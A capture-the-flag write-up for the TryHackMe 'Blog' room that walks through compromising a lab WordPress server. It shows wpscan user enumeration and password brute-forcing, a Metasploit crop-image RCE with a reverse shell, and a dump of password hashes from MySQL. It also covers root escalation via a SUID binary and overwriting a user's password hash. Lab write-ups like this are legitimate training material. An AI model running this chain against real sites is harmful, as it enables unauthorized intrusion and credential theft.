Post

TryHackMe Blog Writeup

Posted
By x3ric
1 min read

https://tryhackme.com/r/room/blog

Discover the foundational aspects of cybersecurity with the Blog Capture The Flag (CTF) challenge, an medium-level exercise. This concise write-up provides clear insights into essential WordPress concepts, presented with simplicity and clarity.

Add Hosts

Edit the /etc/hosts file and add the following entries:

1

10.10.100.29 blog.thm

Script to add hosts automatically

1
2

ip="10.10.100.29";domain="blog.thm"
grep -qF "$ip $domain" /etc/hosts || echo -e "$ip $domain" | sudo tee -a /etc/hosts

Gather Information From WordPress

1

wpscan -e u --url "http://blog.thm/"
  • -e = enumarate
  • u = usernames

result

  • users = bjoel,kwheel
  • theme = twentytwenty

BruteForce WordPress

1

wpscan --url "http://blog.thm/" --usernames bjoel,kwheel --passwords /usr/share/dict/rockyou.txt --password-attack xmlrpc threads 20

result

  • kwheel:cutiepie1

Exploit to Gain Acces

1

msfconsole

1
2
3
4
5
6
7
8

use multi/http/wp_crop_rce
set password cutiepie1
set username kwheel
set rhosts blog.thm
set THEME_DIR twentytwenty
set lhost tun0
exploit
shell

Get an Interactive Shell: Once the reverse shell connects, convert it into an interactive shell:

1

python3 -c 'import pty;pty.spawn("/bin/bash")'

Press Ctrl+Z to background the shell, then run:

1

stty size; stty raw -echo; fg

As the last step, set the terminal environment:

1

export TERM=xterm;

Extract Password Hash From MySQL

1

cat wp-config.php

1

mysql -u wordpressuser -p

1
2
3
4
5

show databases;
use blog;
show tables;
select * from wp_users;
exit

Privilege Escalation

find uid binaries

1

find / -type f -perm -u=s 2>/dev/null

result

  • vulnerable = /usr/sbin/checker
1

ltrace /usr/sbin/checker

result

  • env(admin)

this means the program is reading the admin variable

now simply run it with the variable admin

1
2

admin=1 /usr/sbin/checker;/usr/sbin/checker
whoami

Optional

WordPress Password Hash Generator

gen a password i ‘ve done password

1

mysql -u wordpressuser -p

1
2
3
4
5
6
7

show databases;
use blog;
show tables;
select * from wp_users;
UPDATE wp_users SET user_pass = "$P$Bq7XDB8Xb/jjexb8e4CIiDw38/2HyO." WHERE user_nicename="bjoel";
select * from wp_users;
exit

now you can login http://blog.thm/wp-login.php with bjoel:password

Finally

1
2

cat /root/root.txt
cat /media/usb/user.txt
ctf
thm cft writeup linux wordpress
This post is licensed under CC BY 4.0 by the author.